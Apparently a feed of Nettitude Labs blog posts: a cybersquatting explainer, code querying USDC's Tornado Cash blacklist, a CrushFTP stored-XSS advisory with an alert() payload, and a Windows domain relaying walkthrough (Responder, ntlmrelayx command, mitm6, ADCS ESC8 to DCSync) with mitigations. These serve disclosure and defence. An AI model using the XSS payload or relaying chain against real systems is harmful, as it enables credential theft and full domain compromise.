Normal view

There are new articles available, click to refresh the page.
Before yesterdayNettitude Labs

What is Cybersquatting?

By: Dom Myers
9 November 2022 at 09:00

Cybersquatting is the act of registering a domain name which looks similar to a target domain in order to perform malicious activity. This includes facilitating phishing campaigns, attacking genuine visitors who mistyped an address, or damaging a brand’s reputation. This article will cover the dangers of cybersquatting, what companies can do about it, and outline a plan for a tool which can be used to detect potentially malicious domains.

Many phishing campaigns use generic domains such as discountoffers.com which can be used against any company under the guise of offering discounts or money back. This can then be expanded to use a subdomain such as acme.discountoffers.com to more precisely target a specific brand. However, other more targeted campaigns will use names similar to a legitimate one owned by the target in the hopes that a victim either won’t notice the misspelling or think that the domain is genuine. A real-world example of this was the case of Air France who own www.airfrance.com, as a cybersquatter registered www.arifrance.com and www.airfranceairlines.com to divert users to a website selling discount travel deals.

Companies spend huge amounts of money registering domains that are similar to their primary ones in an attempt to prevent them potentially being used maliciously in the future. Due to cost and logistics, it’s impossible to register every possible domain an attacker might take advantage of, and often by the time a company considers taking such a step, some domains have already been registered. In this latter case, as it’s too late for the company to register it themselves, the next best thing is to be aware of them so action can be taken accordingly.

Common Cybersquatting Techniques

There are several routes an attacker may take in order to choose a domain which is likely to be successful against their target. The following sections detail a few of the thought processes an attacker might go through when choosing a domain using “google.com” as the sample target.

Misspelling

This is when a cybercriminal registers a misspelled domain, and is often known as typosquatting. These types of domains would be where the attacker is hoping a user will accidentally type the target name wrong. Some of these would be based on substituting letters for ones which are next to it on the keyboard or characters typed in a slightly different order. Examples include:

  • googel.com
  • gogle.com
  • soogle.com

As shown below, Google has proactively registered some domains to protect their users and their trademark, redirecting them to the genuine website.

Misspelt domain redirecting to legitimate Google website

Similar looking

These are URLs which look similar to the target and although they could be mistyped by a user looking to visit the target domain, they could also be ones designed to not be typed by the victim. For example, to be used as a link in a phishing email where the attacker hopes the victim doesn’t notice due to its similarity. Techniques for this could include replacing letters with numbers, “i” with “L”, swapping letters around, etc. Examples include:

  • g00gle.com
  • googie.com
  • gooogle.com

Legitimate looking

Another potential technique is registering domains which don’t contain typos and aren’t designed to look like the target but a victim might think it genuine. This could include registering different top-level domains using the legitimate company name, or prepending/appending words to the target. Examples include:

  • googlesupport.com
  • google.net
  • google-discounts.com

What can I do if someone registers my domain?

So you have identified a list of similar domains to yours. You’ve investigated and found that one of the domains has mirrored your own website and is being used to launch phishing campaigns against your employees. What do you do now?

In the United States there are two avenues for legal action:

  • Internet Corporation of Assigned Names and Numbers (ICANN)
  • Anticybersquatting Consumer Protection Act (ACPA)

ICANN Procedure

ICANN has developed the Uniform Domain Name Dispute Resolution Policy (UDNDRP), to resolve disputes for domains which may potentially infringe on trademark claims. A person can bring an action by complaining that:

  • A domain name is identical or confusingly similar to a trademark or service mark in which the complainant has rights; and
  • The domain has no rights or legitimate interests in respect of the domain name; and
  • The domain name has been registered and is being used in bad faith.

If the action is successful, the domain will either be cancelled or transferred to you.

Legal Action Under the ACPA

The Anticybersquatting Consumer Protection Act (ACPA) was enacted in 1999 in order to combat cybersquatting such as the case described in this article. A trademark owner may bring an action against a squatter who:

  • Has a bad faith intent to profit from the trademark
  • Registers, traffics in, or uses a domain name that is
    • Identical or confusingly similar to a distinctive trademark
    • Identical or confusingly similar to or dilutive of a famous trademark
    • Is a protected trademark

A UDNDRP proceeding is generally the more advised course of action to take, as they tend to be faster and cheaper.

User awareness and technical solutions

As these proceedings can be time consuming (or if your business is based outside of the United States), more immediate measures can be taken to at least protect a client’s own internal users. Making employees aware of a new phishing site is one of the quickest and easiest steps that can be taken to help them stay on the lookout and reduce the chance of success for the attacker.

In addition to this, email policies can be set up to block incoming emails from these potential phishing domains so that they never reach employees in the first place. Some determined attackers may attempt to get round this by contacting employees via another medium such as telephone, coercing victims to visit their site manually via a web browser. In these cases, networking solutions may be able to help to prevent users from connecting to these malicious domains at all by blocking them at the firewall level.

Conclusion

Cybersquatting is threat which is often overlooked, and many companies either don’t consider protection until they’ve been affected by it, or believe it’s something they aren’t able to proactively defend against. Nettitude are aiming to assist clients further in this area by developing the tools to allow domains to be continuously monitored for potentially suspicious permutations.

The post What is Cybersquatting? appeared first on Nettitude Labs.

How Circle Banned Tornado Cash Users

28 September 2022 at 09:00

Tornado Cash is an open-source, decentralised cryptocurrency mixer. Using zero-knowledge proofs, this mixes identifiable funds with others, obscuring the original source of the funds. On 08 August 2022, the U.S. Office of Foreign Assets Control (OFAC) banned the Tornado Cash mixer, arguing that it had played a central role in the laundering of more than $7 billion.

The USD Coin (USDC) is a centralised digital currency that can be used for online payments. The issuer of the USDCs – the Circle company – guarantees that every digital coin is fully backed by actual U.S. dollars, with the value of one USDC pegged to an actual U.S. dollar. Following the ban, the Circle company started to freeze addresses linked with the Tornado Cash mixer.

This article does not aim to address any political views or opinions but rather to present an interesting case study on how this was technically achieved. We can seize this opportunity to investigate several basic but key concepts of Ethereum and Ethereum-based blockchains. For simplicity, in this article we will primarily focus on Ethereum.

Understanding ERC-20 Tokens

With Ethereum, tokens are handled by smart contracts – simple and short programmes stored on the blockchain that can be called via transactions. The smart contract is then responsible among other things for handling users’ transactions or storing owners’ balances.

A standard ABI (Application Binary Interface) for manipulating tokens called ERC-20 (Ethereum Request for Comments 20) was released to ease interoperability, and is described in the Ethereum Improvement Proposals (EIP) 20. The USDC follows that standard.

ERC-20 specifications are fairly short. To be a valid ERC-20 token, the deployed smart contract must simply implement the following functions:

  • totalSupply()
  • balanceOf(account)
  • allowance(owner, spender)
  • approve(spender, amount)
  • transfer(recipient, amount)
  • transferFrom(sender, recipient, amount)

It must also implement the following events:

  • Transfer(from, to, value)
  • Approval(owner, spender, value)

The USDC token

To understand how the USDC was implemented we only need the smart contract address and its source code, published by Circle:

There is a subtlety here but we will not go into detail. The source code for the real ERC-20 API for USDC can be retrieved from a proxy contract, which can be found at the following address:

You can check OpenZeppelin’s Unstructured Storage proxy pattern for more information. In short, using a proxy contract is a convenient way to manage upgrades.

The totalSupply() function

The totalSupply() function is pretty much self-explanatory and can be used at any time to find out how many tokens were minted in total.

Open Etherscan and search for the USDC contract address. Go to the “Contract” tab next to “Transactions”, “Internal Txns” and “Erc20 Token Txns”. Then click on the “Read as Proxy” button and scroll down the list to “totalSupply”.

At the time of writing, this was 42039807469599550 and with the decimal 42,039,807,469.599550 USDC. ERC-20 tokens can freely implement a decimals() function which is set to 6 here. Because we only “read” from the blockchain, these operations are free.

The transfer() Function

In order to send an ERC-20 token to another address, one would need to send a transaction to the transfer() function with the recipient address and the number of tokens to send as arguments. To make things easier we will only discuss here how a transaction is sent to a full Ethereum node and skip the part where it is actually added to the blockchain.

Let us examine how the transfer() function was implemented. The released code is written in Solidity. This is mostly straightforward, and not necessary to know in order to understand the following.

You can see notBlacklisted(msg.sender) and notBlacklisted(to) on lines 867 and 868. These are function modifiers, similar to Python’s decorators, and they wrap the function underneath.

The source code of the modifier is quite explicit. In Solidity, require() is a control function in which the initial parameter must be set to true, otherwise the transaction is reverted. Here the _account address is checked against the blacklisted mapping which is simply a hash table. It can be accessed with a key, i.e. the address, and it returns a value. If the address is not in the mapping, 0 is returned.

The value msg.sender is the address issuing the transaction, and to is the recipient. If none of these addresses are found in the blacklisted mapping, the _transfer() function is called and the transaction is enabled.

The blacklisted mapping is filled using the blacklist function.

Similarly, the onlyBlacklister() modifier protects unauthorised blacklisting of addresses.

TransferFrom() and Approve() functions

The transferFrom() function is very similar to the transfer() function and is mostly used by smart contracts to transfer tokens on your behalf. In theory it is possible to send tokens directly to a smart contract using transfer() and then call the desired function. However, this requires two transactions and the smart contract would have no idea about the first one.

The solution is to grant a smart contract access to transfer a limited or unlimited amount of tokens. This is achieved using the approve() function.

Following approval, the transferFrom() function can be called.

Both functions are of course covered by the notBlacklisted() modifier.

How to check whether an address is blacklisted

Now that we understand how Circle can block token transfers, we can play with the smart contract to determine whether an address is banned. For the demo we will use Vitalik’s, one of the Ethereum’s founders, wallet address.

The smart contract exports a function called isBlacklisted; all we need to do is to call it with the desired address.

Below is a small TypeScript piece of code that does exactly that:

import "dotenv/config";
import { ethers } from "ethers";

const USDC_PROXY_ADDRESS = "0xB7277a6e95992041568D9391D09d0122023778A2";
const VITALIK_WALLET = "0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B";

const isBlacklisted = async (
   usdcContract: ethers.Contract,
   address: string
) => {
   const ret = await usdcContract.isBlacklisted(address);
   console.log(`Wallet ${address} is ${ret ? "" : "not"} blacklisted.`);
};

const main = async () => {
   const provider = new ethers.providers.JsonRpcProvider(
      process.env.HTTPS_ENDPOINT
   );

   const usdcContract = new ethers.Contract(
      USDC_PROXY_ADDRESS,
      ["function isBlacklisted(address _account) view returns (bool)"],
      provider
   );

   await isBlacklisted(usdcContract, VITALIK_WALLET);
};

Full code is available here.

$ ts-node src/isblacklisted.ts
Wallet 0xAb5801a7D398351b8bE11C439e05C5B3259aeC9B is not blacklisted.

Vitalik’s wallet is safe!

Or we could simply ask Etherscan again.

How to find all blacklisted addresses

We know how to check whether a single address was banned, but how can we retrieve all blacklisted addresses? Unfortunately for us, transactions are not indexed in the Ethereum blockchain and it is not possible to simply list the content of the mapping.

An important point here! Mapping cannot be used to store any secret. Anyone with a copy of the blockchain can retrieve all transaction data.

One way would be to go through every block and transaction and then dissect them to find transactions to the blacklist() function. However, this would be quite inefficient and extremely slow. Fortunately, Circle implemented an event that is issued every time an address is banned. And unlike transactions, events are indexed.

If we check the blacklist() function code, we can see the event on the last line.

The _account argument is also indexed.

To access logs, we can use the RPC method eth_getLogs() of an Ethereum node. This method accepts a few parameters:

  • fromBlock and toBlock
  • a contract address
  • and an array called topics

Topics are indexed parameters of an event, and they can be viewed as filters. The first topic, topic[0] is always the event signature, a keccak256 hash of the event name and parameters. This is easily computed using the ethers.js library.

ethers.utils.id("Blacklisted(address)");

The hash in our case is:

  • 0xffa4e6181777692565cf28528fc88fd1516ea86b56da075235fa575af6a4b855

The other topics are the arguments. For Blacklisted() it is an address. Since we want to find all events, this argument is left empty.

Even with an event filter, searching for the entire blockchain would take too long as there have been too many transactions since the genesis block. In this example we will only list Blacklisted() events that happened on the day of the ban, on 08 August 2022.

  • 2022-08-08 00:00
    • block number: 15298283
  • 2022-08-08 23:59
    • block number: 15304705
const filter = {
   address: USDC_ERC20_ADDRESS,
   fromBlock: 15298283,
   toBlock: 15304705,
   topics: [ethers.utils.id("Blacklisted(address)")],
};

Using ethers.js, we can call the getLogs() method using our filter.

const logs = await this.provider.getLogs(filter);

/* Sorting unique addresses. */
this.addresses = [
   ...(new Set() <
   string >
   logs.map((log) =>
      ethers.utils.getAddress(`0x${log.topics[1].substr(26)}`)
   )),
];

All we need to do now is to display the wallet addresses and frozen balances:

const symbol = await this.usdcContract.symbol();
console.log(`[+] ${this.addresses.length} wallets address found:`);

await Promise.all(
   this.addresses.map(async (address) => {
      const amount = await this.usdcContract.balanceOf(address);
      console.log(
         ` - ${address}: ${ethers.utils.formatUnits(amount, "mwei")} ${symbol}`
      );
   })
);

Running the script from the terminal gives us all the wallets that were banned that day.

> ts-node src/findbanned.ts
[+] 38 wallets address found:
- 0x8589427373D6D84E98730D7795D8f6f8731FDA16: 0.0 USDC
- 0xd90e2f925DA726b50C4Ed8D0Fb90Ad053324F31b: 0.0 USDC
- 0xDD4c48C0B24039969fC16D1cdF626eaB821d3384: 149.752 USDC
- 0xD4B88Df4D29F5CedD6857912842cff3b20C8Cfa3: 0.0 USDC
- 0x722122dF12D4e14e13Ac3b6895a86e84145b6967: 0.0 USDC
- 0xFD8610d20aA15b7B2E3Be39B396a1bC3516c7144: 0.0 USDC
- 0xF60dD140cFf0706bAE9Cd734Ac3ae76AD9eBC32A: 0.0 USDC
- 0xd96f2B1c14Db8458374d9Aca76E26c3D18364307: 3900.0 USDC
- 0x910Cbd523D972eb0a6f4cAe4618aD62622b39DbF: 0.0 USDC
- 0x4736dCf1b7A3d580672CcE6E7c65cd5cc9cFBa9D: 71000.0 USDC
- 0xb1C8094B234DcE6e03f10a5b673c1d8C69739A00: 0.0 USDC
- 0xA160cdAB225685dA1d56aa342Ad8841c3b53f291: 0.0 USDC
- 0xBA214C1c1928a32Bffe790263E38B4Af9bFCD659: 0.0 USDC
- 0x22aaA7720ddd5388A3c0A3333430953C68f1849b: 0.0 USDC

[...]

- 0x2717c5e28cf931547B621a5dddb772Ab6A35B701: 0.0 USDC
- 0x178169B423a011fff22B9e3F3abeA13414dDD0F1: 0.0 USDC

As mentioned previously, full code is available here.

Conclusion

Crypto assets are of a new kind of asset and a blooming technology. Understanding how Circle banned Tornado Cash users was a good excuse to understand key concepts and to explore the Ethereum blockchain. However we have only scratched the surface. Other assets may have different implementations, restrictions, different trade-offs. So always remember the famous principle: Don’t trust, verify!

The post How Circle Banned Tornado Cash Users appeared first on Nettitude Labs.

CVE-2021-44076: Cross-Site Scripting (XSS) in CrushFTP

14 September 2022 at 09:00

During the course of our work, Nettitude have identified a stored Cross-Site Scripting (XSS) vulnerability within the CrushFTP web interface.

CrushFTP is a file transfer server which supports multiple file transfer protocols, and provides a web interface for users to manage their files, as well as for administrators to manage and monitor the service.

Background

Within the /WebInterface/UserManager page of the web interface, there is an option to create a new user. Although client-side sanitization of input prevents the creation of a user whose username contains special characters, the same is not true for the server-side validation of the given data. An attacker who intercepts and modifies the traffic before the username is added to the application’s backend can create a user that contains JavaScript or HTML within the username property.

As shown below, there is a list of the most visited users displayed at the top of the page.

Graphical user interface, application Description automatically generated

The list consists of <a> HTML tags that contain each username. The double-quote character is not properly sanitized inside the <a> tag allowing the insertion of JavaScript or HTML payloads within a username field, leading to cross-site scripting. In addition to this, the payload would also be executed when an attempt is made to delete the user. This is because the pop-up message that appears for confirmation does not encode usernames upon output, thus allowing crafted JavaScript or HTML payloads to be executed within the web browser.

Exploitation

CrushFTP stores the details of registered users within the filesystem in the users/MainUsers directory. The contents of this directory are shown below, with the users crushadmin, default, and TempAccount each having their own directory.

Text Description automatically generated

The user’s directory contains a file called user.XML, which contains the data associated with the account. This is where information such as the username, password, etc, is stored in XML format.

Text Description automatically generated

When attempting to create a user, after a request to check if the username already exists, the application performs a POST request towards the /WebInterface/function/ endpoint. The command used within the request is setUserItem which creates the user folder in the application’s backend containing the given information.

Text Description automatically generated

The text highlighted below in red is the name of the directory that will be created for the user, while the text highlighted in blue is the username that will be saved within their user.XML file. Nettitude modified this request, placing the value random_user1 within the username POST parameter and random_user2 within the username parameter in the XML data.

Text Description automatically generated

The new user then appeared within the users panel on the left hand side of the page.

From this, it was clear that the web application indexes the username by the name of the directory created for the user, and not by the username that is added in the user.XML file. Nettitude reproduced the previous steps, but this time replacing the username parameter with random_user"<img+src%3d1+onerror%3d"alert(1)">. This payload is designed to display a JavaScript alert when rendered within a web browser.

Text Description automatically generated

The application failed to validate the integrity of the data server-side, and the user’s folder was created with the payload included, as shown below.

Text Description automatically generated

After the operation was completed, the newly created user appeared within the users panel.

A picture containing table Description automatically generated

The mostVisitedLinks list was also populated with the most visited users’ profiles.

Since the username had been tampered with and no output encoding was performed prior to adding the username to the user attribute of the <a> object, the double-quote of the user attribute was escaped, and the <img> tag that was injected in the username was rendered within the page.

Given that an invalid image source was used within the payload, this meant that the onerror JavaScript event was triggered and the script executed.

Graphical user interface, application Description automatically generated

If an attempt was made to delete the user, the payload would fire again in the pop-up window that appears.

Graphical user interface, application, website Description automatically generated

Graphical user interface, application Description automatically generated

The impact of a cross-site scripting attack can vary depending on the payload used, but it can usually be exploited for theft of information such as session cookies or other sensitive data, or to conduct unauthorised actions on behalf of an affected user. In this instance it may be exploited for privilege escalation or account takeover.

Conclusion

This vulnerability affected CrushFTP prior to version 9.4.0_15. Any later versions are no longer affected by this vulnerability, as the vendor was informed and performed the necessary actions to remediate the issue.

Multiple parts of the source code contribute to the payload’s execution in various fields, but the main reason behind the vulnerability is the incorrect sanitization of the username as it is processed within the backend. This, can be found in the setUserItem function inside the crushftp/server/AdminControls.class file.

Graphical user interface Description automatically generated with medium confidence

No input filtering was performed on the username, so special characters entered in the username field are not removed or sanitized in any way. In addition to this, no output encoding was performed when the data was displayed within the affected page itself. Proper output encoding, in combination with a strong content security policy, should always be used to mitigate the risk of cross-site scripting.

Timeline

  1. Discovery by Nettitude: 19 November 2021
  2. CVE Assigned: 19 November 2021
  3. Vendor informed: 04 March 2022
  4. Vendor fix released: 08 March 2022

The post CVE-2021-44076: Cross-Site Scripting (XSS) in CrushFTP appeared first on Nettitude Labs.

Network Relaying Abuse in a Windows Domain

31 August 2022 at 09:00

Network relaying abuse in the context of a legacy Windows authentication protocol is by no means a novel vector for privilege escalation in a domain context. However, in spite of these techniques being well understood and documented for many years, it is unfortunately still common during the course of an internal network penetration test for Nettitude consultants to escalate from a low privileged user to Domain Admin in a matter of hours (or even minutes). This is due to a handful of Active Directory and internal network misconfigurations which this article will explore.

Through the course of four scenarios, we’ll cover both longstanding and more recent attack primitives that center around relaying techniques in the hopes that network defenders can apply the mitigations contained therein.

Scenario 1 – LLMNR/NBT-NS Poisoning

Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are alternative resolution protocols used to derive a machine’s IP address given its hostname on the network.

LLMNR, which is based upon the DNS format, enables name resolution on link local scenarios and has been around since the dawn of Windows Vista. It is the spiritual successor to NBT-NS, which uses a system’s NetBIOS name to identity it on the network.

In general, name resolution (NR) protocols stand as the final fallback should suitable records not be found in local host files, DNS caches, or the configured DNS servers. One can think of the purpose of NR protocols as allowing a host to broadly query its neighbors over multicast: “Hey, does anyone have x resource, as I can’t find it anywhere else?”

These broadcasts are sent out to the entire intranet; however, no measures are taken to verify the integrity of the response of addresses and the address providers on the network, since Microsoft views the network as a trust boundary; as such, malicious actors can take advantage of essentially a race-condition and interpose themselves as an authoritative source for name resolution by replying to LLMNR (UDP 5355)/NBT-NS (UDP 137) requests with popular opensource offensive tooling such as Responder. Crucially, if the requested resource requires authentication, the victim’s username and NetNTLM hash are summarily sent to the adversary’s spoofed authoritative node.

Mistyping, misconfigurations (either on the DNS server or client side), WPAD, or even Google Chrome can easily lead to a scenario in which the client machine relies on multicast name resolution queries and gifts a malicious man-in-the-middle its coveted hash.

In this demonstration, the attacker sets up Responder listening on eth0 and with the -wF flags to start the WPAD rogue proxy server and force NTLM authentication on wpad.dat file retrieval:

Shortly thereafter, the victim (on client01 at 192.168.136.133) requests a shared resource via SMB with an unfortunate misspelling:

As demonstrated below, the attacker then responds to the name resolution query initiated by the victim via LLMNR, naming himself as the recipient and receiving the victim’s credentials in return:

From here, the user’s hash can either be cracked offline using a hash cracker like Hashcat or possibly relayed further in the environment to authenticate to other network resources via relay attacks, should mitigations such as SMB signing be disabled.

Mitigations:

  1. Open the Group Policy Editor and navigate to Local Computer Policy > Computer Configuration > Administrative Templates > Network > DNS Client
  2. Ensure that the option “Turn OFF Multicast Name Resolution” is enabled.
  3. To disable NBT-NS on Windows clients:
  4. Open your Network Connections and view the properties of the network adapter.
  5. Select TCP//IPv4 and select “Properties.”
  6. Select “Advanced” on the “General” tab and navigate to the WINS tab, then choose “Disable NetBIOS over TCP/IP.”

Scenario 2 – NetNTLM Relay over SMB

Continuing our exploitation of the potential consequences of LLMNR and NBT-NS broadcast traffic being present in the target environment, let’s turn our attention to relaying the NetNTLM hashes previously captured by Responder and see if more damage can be done.

Much like wine and cheese, Responder and Ntlmrelayx from the Impacket suite are the perennial pairing here. The idea is that an attacker can opt to relay captured NetNTLM hash to any systems on the network that have SMB signing turned off, which is the default setting on Windows clients.

After configuring Responder with its SMB and HTTP server deactivated (which can typically be done by editing /etc/responder/Responder.conf) and running the module via CLI as before (responder -I eth0 -wF), the attacker can then set up ntlmrelayx to listen for incoming connections with smb2 support enabled:

Text Description automatically generated

In this simulated scenario, an administrator on DC01 (192.168.136.132) mistypes a network share, which leads to a successful relay of the NetNTLM hash to client01 (192.168.136.133) and the dumping of the SAM, or the Security Account Manager, which is a database present on Windows machines that stores local user accounts and authentication information:

Timeline Description automatically generated

Do be advised that from MS08-068 and onwards, it is impossible to relay the same NetNTLM hash to the originating machine from which it was issued; as such, in order for this attacker to work, it is necessary to relay the hash originating from DC01 to client01.

Apart from dumping the computer’s SAM, which is disastrous in and of itself, an attacker could also elect to execute arbitrary commands on the target system or even spawn an SMB session on the host, which is what shall be demonstrated next. Upon successful relay of the administrator hash to client01, a malicious actor is presented with an interactive SMB client shell on 127.0.0.1:1000 after specifying the -i flag when deploying ntlmrelayx:

Text Description automatically generated

From here, the attacker has full access to the C$ drive and can amplify their foothold on the network by deploying a remote access trojan (RAT) or even proliferating ransomware through the network’s file system:

Graphical user interface, text Description automatically generated

Mitigations:

  1. The steadfast advice from Microsoft when it comes to any variant of the classic NTLM relay attack is to migrate from the natively vulnerable NTLM challenge-response authentication to the far more secure method of Kerberos authentication when possible. Kerberos has been Microsoft’s preferred replacement for NTLM since the inception of Windows 2000.
  2. For those organizations that must use NTLM in their environments, it is recommended that EPA (Extended Protection for Authentication) and SMB signing are enabled, which in conjunction can vastly blunt the possibility of NTLM relay attacks.

Scenario 3 – IPv6 Carnage

Another common man-in-the-middle privilege escalation vector that poses risk an enterprise domain context stems from the abuse of IPv6, which is enabled by default on modern Windows operating systems and takes precedence over its predecessor IPv4 since the release of Vista. As such, systems internally poll the network for IPv6 leases, which plays into an attack vector still ripe with potential in 2022. For a step-by-step breakdown of how this all works:

  1. An IPv6 client periodically sends out solicit packets on the local network, seeking an IPv6 router.
  2. When an IPv6 router is present, it sends out an advertise packet in response to the solicit packet. This advertise packet informs the client that the IPv6 router is available for DHCP services.
  3. The IPv6 client replies with a request packet to the DHCPv6 server, asking for an IPv6 configuration.
  4. Finally, the DHCPv6 server issues the IPv6 configuration to the IPv6 client, which specifies several things, including the IP address, default gateway, DNS servers, etc. This is all included in the reply packet.

The idea with this attack, which utilizes Dirk-jan Mollema’s excellent research from 2018, is that a malicious actor can interpose their machine as an IPv6 router and force authentication to their server as the authoritative DNS server on the network over any other IPv4 servers. The attacker can then in tandem utilize ntlmrelayx to relay captured credentials to the specified target machine, leading to dumping of sensitive domain information or possibly even the addition of additional computer accounts or escalated privileges.

To set up this scenario, mitm6 is launched listening on eth0 and targeting the lab.local domain along with the machine client01:

Shortly thereafter, the preferred IPv6 DNS server is displayed from the perspective of the command prompt of our client01 victim as being the attacker’s machine, where 192.168.136.132 is the IPv4 address of the lab.local domain controller:

From here, ntlmrelayx is launched targeting the relay to the domain controller with the following command, with the -6 flag ensuring that our ntlmrelayx listens for both IPv4 and IPv6 connections and the -wh flag specifying a non-existent WPAD file host:

ntlmrelayx.py -6 -t ldap://192.168.136.132 wh netti-wpad.lab.local -l loot

After simulating the client machine rebooting and joining the network, it is observed that the attack successfully relays the client01 machine account against the DC:

Text Description automatically generated

This enables the attacker to gather and enumerate valuable information against the target domain environment, including group memberships, domain policies, and sensitive information disclosed in any AD object’s description fields, as demonstrated below:

It should be remarked that, while the scenario of the service account password being exposed in cleartext in the AD object’s description field is contrived for this example, it is unfortunately a practice that is still observed in modern-day engagements.

Now, while the aforementioned information dump about the targeted AD objects is certainly valuable, things can take a decisive turn for the worst should an attacker set up the ntlmrelay over LDAPS. Relaying to LDAP over TLS offers an opportunity for quick compromise of an entire domain, as creating new accounts is not possible over unencrypted connections. Specifying the --delegate-access flag on ntlmrelayx and waiting for the victim to request an IPv6 address or a WPAD configuration leads to the following series of events in the attacker’s console:

Once the victim requests a new IPv6 address or WPAD configuration from the mitm6 server (this is often seen when the victim reboots their machine or plugs in their network cable again), the ntlmrelayx server receives the connection and creates a new computer account over LDAPS, which is permitted by the default AD setting which dictates that any domain user can add up to 10 computer accounts:

From here, the malicious actor can utilize getST.py from the impacket suite to take advantage of a classic resource-based constrained delegation attack vector in order to have the new computer account request service tickets for itself on behalf of any other user in the domain, including the administrator. The typical flow of this attack finishes with requesting a TGS for the CIFS service of the target computer impersonating the domain administrator and dumping the SAM with impacket’s secretdump.py module, as previously demonstrated. In case the reader needs a refresher on the meaning of terms like TGS or a primer on Kerberos-based attacks, please consult this excellent resource as additional reading.

Should a user with functional permissions of domain admin log into one of the workstations in scope of the mitm6 attack, ntlmrelayx can be further weaponized to create a new enterprise administrator user; below, the domain administrator “henry” logs into the target machine, after which the authentication is relayed against the domain controller of the target environment:

Further in the output below, ntlmrelayx adds a new user with Replication-Get-Changes-All privileges:

Text Description automatically generated

At this point, it is game over for the domain’s integrity. An attacker can achieve complete domain compromise by dumping all domain user hashes from the Ntds.dit file, which is essentially the database at the heart of active directory:

Chart Description automatically generated with low confidence

Now that the wide-ranging ramifications of a simple IPv6 network configuration being left in its default state have been fully explored, let’s turn to discussing mitigating the factors that make this attack chain possible. Owing to the fact that there were several components abused along the way, there are several mitigation aspects to address.

Mitigations:

In summary, the mitm6 tool abuses the fact that Windows by default queries for an IPv6 address even in IPv4-only environments. If IPv6 is not internally in use, the surest way to prevent mitm6 attacks is to block DHCPv6 traffic and incoming router advertisements in Windows Firewall via Group Policy. However, entirely disabling IPv6 entirely may have unwanted side effects. As outlined in the linked article source below verbatim, setting the following predefined rules to Block instead of Allow prevents the attack from working:

  • (Inbound) Core Networking – Dynamic Host Configuration Protocol for IPv6(DHCPV6-In)
  • (Inbound) Core Networking – Router Advertisement (ICMPv6-In)
  • (Outbound) Core Networking – Dynamic Host Configuration Protocol for IPv6(DHCPV6-Out)

Mitigating WPAD abuse:

If WPAD is not in use internally, disable it via Group Policy and by disabling the WinHttpAutoProxySvc service.

Mitigating relaying to LDAP:

Relaying to LDAP and LDAPS can only be mitigated by enabling both LDAP signing and LDAP channel binding.

Mitigating resource-based delegation abuse:

As RBCD is a part and parcel of intended Kerberos functionality, there is no one-click mitigation here. Most of the attack surface can however be reduced by adding administrative and key users to the Protected Users group or by marking the account as sensitive and ineligible for delegation.

Scenario 4 – Nothing but Certified Trouble

In the summer of 2021, SpecterOps researchers Will Schroeder and Lee Christensen published a deluge of information on the attack potential in inherently insecure Active Directory Certificate Services (hereafter ADCS, essentially Microsoft’s PKI implementation). While a full discussion of the eight attack mappings (ESC1 through ESC8) is outside of the scope of this blog post, it is worthwhile to explore ESC8 further as it stands as an excellent recent example of the continued potential for domain compromise that NTLM relay poses.

Essentially, this vulnerability arises from the fact that the web interface of the ADCS allows NTLM authentication by default and does not enforce relay mitigations by default. If the certificate authority in the domain does indeed have the web enrolment feature enabled (which is exposed typically via http://<CA_SERVER/certsrv/ upon the Certificate Authority Web Enrolment role being installed on the server), then the attacker can carry out an NTLM relay to the HTTP endpoint. Per the linked SpecterOps resource:

“This attack, like all NTLM relay attacks, requires a victim account to authenticate to an attacker-controlled machine. An attacker can coerce authentication by many means, but a simple technique is to coerce a machine account to authenticate to the attacker’s host using the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex) methods using a tool like SpoolSample or Petitpotam. The attacker can then use NTLM relay to impersonate the machine account and request a client authentication certificate (e.g., the default Machine/Computer template) as the victim machine account. If the victim machine account can perform privileged actions such as domain replication (e.g., domain controllers or Exchange servers), the attacker could use this certificate to compromise the domain. Otherwise, the attacker could logon as the victim machine account and use S4U2Self as previously described to access the victim machine’s host OS.”

With the theory out of the way, let’s see this attack in action. First, from their initial foothold on the client01 machine as a low-privileged user, the attacker can utilize the living-off-the-land binaries, like certutil.exe, to enumerate certificate authorities in the domain:

From here, the attacker can set up ntlmrelayx to forward incoming forced authentications from DC01 to the HTTP endpoint for certificate enrolment; note that ExAdndroidDev’s fork of Impacket with support for ADCS exploitation was utilized for this demonstration:

As the final step in the attack chain, the PowerShell implementation of PetitPotam is leveraged in order to coerce an authentication from DC01 to our relay server:

At this point, the CA issues a certificate for the DC01$ computer account, which is captured by the ntlmrelayx server:

Now that the hard work is done, from here, with the base64 certificate of the domain controller computer account in hand, the attacker can use Rubeus to request a Kerberos TGT for the DC01$ computer account and can now perform a DCSync to request the NTLM hash of the krbtgt user to achieve complete domain compromise and persistence.

Mitigations:

  1. Prior to releasing the offensive tooling for ADCS exploitation, SpecterOps released the PSPKIAudit auditing toolkit to enable defenders to proactively monitor their environments for potential ADCS misconfigurations. Please do recall that there are seven other scenarios for ADCS abuse which are outlined in the original SpecterOps whitepaper and not discussed in this blog post, so concerned blue team individuals are encouraged to read more here.
  2. Alongside reviewing the aforementioned resources, it is highly recommended that defenders enumerate the Web Enrolment interfaces in their environment (either with or without PSPKIAudit) and either enforce HTTPS and enable EPA on the IIS server endpoints or remove the endpoints if possible altogether.
  3. If not already doing so, defenders are encouraged to treat CA servers as tier 0 assets along with domain controllers from an asset management standpoint.

Conclusion

Owing to the fact that an attacker would need to have successfully leveraged another server-side vulnerability or a social-engineering attack to be in the position to relay credentials as a man-in-the-middle, hardening domain authentication and superfluous network broadcast traffic stands as an important component of Defence in Depth (DiD). While Microsoft may have worked to address the impact of some of these relay issues at different levels, it is nonetheless paramount that network administrators and defenders do their part to blunt the force of these vectors to potential domain takeover by following the mitigation advice on the subject. As there is no silver bullet to pre-emptively thwart every network attack primitive, the remedial guidance contained in this article can be followed as part of the multifaceted approach of DiD to secure the digital estate from domain compromise. Nettitude’s specialized internal infrastructure penetration testing services can also provide network stakeholders with world-class technical knowledge and tailored advice on remediating the issues explored here and beyond.

The post Network Relaying Abuse in a Windows Domain appeared first on Nettitude Labs.

CVE-2022-30211: Windows L2TP VPN Memory Leak and Use after Free Vulnerability

17 August 2022 at 09:00

Nettitude discovered a Memory Leak turned Use after Free (UaF) bug in the Microsoft implementation of the L2TP VPN protocol. The vulnerability affects most server and desktop versions of Windows, dating back to Windows Server 2008 and Windows 7 respectively. This could result in a Denial of Service (DoS) condition or could potentially be exploited to achieve Remote Code Execution (RCE).

Please see the official Microsoft advisory for full details:

